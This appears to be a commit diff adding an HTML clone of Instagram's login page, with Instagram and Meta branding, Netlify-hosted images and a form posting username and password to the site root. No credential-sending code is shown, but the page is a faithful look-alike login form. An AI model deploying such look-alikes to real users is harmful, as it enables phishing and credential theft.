1+ <!DOCTYPE html>
2+ < html lang ="en ">
3+
4+ < head >
5+ < meta charset ="UTF-8 ">
6+ < meta http-equiv ="X-UA-Compatible " content ="IE=edge ">
7+ < meta name ="viewport " content ="width=device-width, initial-scale=1.0 ">
8+ < title > Instagram Login Page</ title >
9+ <!-- font awesome-->
10+ < script src ="https://kit.fontawesome.com/e2bfc5138f.js " crossorigin ="anonymous "> </ script >
11+ <!--style sheets-->
12+ < link rel ="stylesheet " href ="styles.css ">
13+
14+ </ head >
15+
16+ < body >
17+ < section class ="wrapper ">
18+ < div class ="left ">
19+ < img src ="https://64b448dcbebe496a150a8945--joyful-peony-566b51.netlify.app/phone.png " height ="581.15px "
20+ alt ="phone ">
21+ < img class ="screen " id ="rotator " height ="538.84px "
22+ src ="https://64b448dcbebe496a150a8945--joyful-peony-566b51.netlify.app/screen1.png " alt ="phone-screen ">
23+ </ div >
24+ < div class ="right ">
25+ < div class ="panel login ">
26+ < img id ="logo " src ="https://64b448dcbebe496a150a8945--joyful-peony-566b51.netlify.app/logo.png "
27+ alt ="logo ">
28+
29+ < form action ="/ " method ="post ">
30+ < input class ="input-box " type ="text " name ="username " placeholder ="Phone number, username or email "
31+ required >
32+ < input class ="input-box " type ="password " name ="password " placeholder ="Password " required >
33+ < input class ="button " type ="submit " name ="login " value ="Log In ">
34+ < div class ="divider ">
35+ < div class ="line "> </ div >
36+ < p > OR</ p >
37+ < div class ="line "> </ div >
38+ </ div >
39+ < a class ="fb " href ="# "> Log In with Facebook</ a >
40+ < a class ="forgot " href ="# "> Forgot password?</ a >
41+ </ form >
42+ </ div >
43+ < div class ="panel signup ">
44+ < p > Don't have an account? < a href ="# "> Sign up</ a > </ p >
45+ </ div >
46+ < div class ="apps ">
47+ < p > Get the app.</ p >
48+ < div class ="app-stores ">
49+ < img src ="https://64b448dcbebe496a150a8945--joyful-peony-566b51.netlify.app/appstore.png "
50+ alt ="appstore ">
51+ < img src ="https://64b448dcbebe496a150a8945--joyful-peony-566b51.netlify.app/playstore.png "
52+ alt ="playstore ">
53+ </ div >
54+ </ div >
55+ </ div >
56+ </ section >
57+ < footer >
58+ < ul >
59+ < li > < a href ="https://about.facebook.com/meta "> Meta</ a > </ li >
60+ < li > < a href ="https://about.instagram.com/ "> About</ a > </ li >
61+ < li > < a href =# > Blog</ a > </ li >
62+ < li > < a href =# > Jobs</ a > </ li >
63+ < li > < a href =# > Help</ a > </ li >
64+ < li > < a href =# > API</ a > </ li >
65+ < li > < a href =# > Privacy</ a > </ li >
66+ < li > < a href =# > Terms</ a > </ li >
67+ < li > < a href =# > Top Accounts</ a > </ li >
68+ < li > < a href =# > Hashtags</ a > </ li >
69+ < li > < a href =# > Locations</ a > </ li >
70+ < li > < a href =# > Instagram Lite</ a > </ li >
71+ < li > < a href =# > Beauty</ a > </ li >
72+ < li > < a href =# > Dance</ a > </ li >
73+ < li > < a href =# > Fitness</ a > </ li >
74+ < li > < a href =# > Food & Drink</ a > </ li >
75+ < li > < a href =# > Home & Garden</ a > </ li >
76+ < li > < a href =# > Music</ a > </ li >
77+ < li > < a href =# > Visual Arts</ a > </ li >
78+ </ ul >
79+ < ul >
80+ < li > English</ li >
81+ < li > ©
82+ < span id ="copyright-year "> </ span >
83+ Instagram from Meta
84+ </ li >
85+ </ ul >
86+ </ footer >
87+
88+ < script src ="script.js "> </ script >
89+ </ body >
90+
91+ </ html >
0 commit comments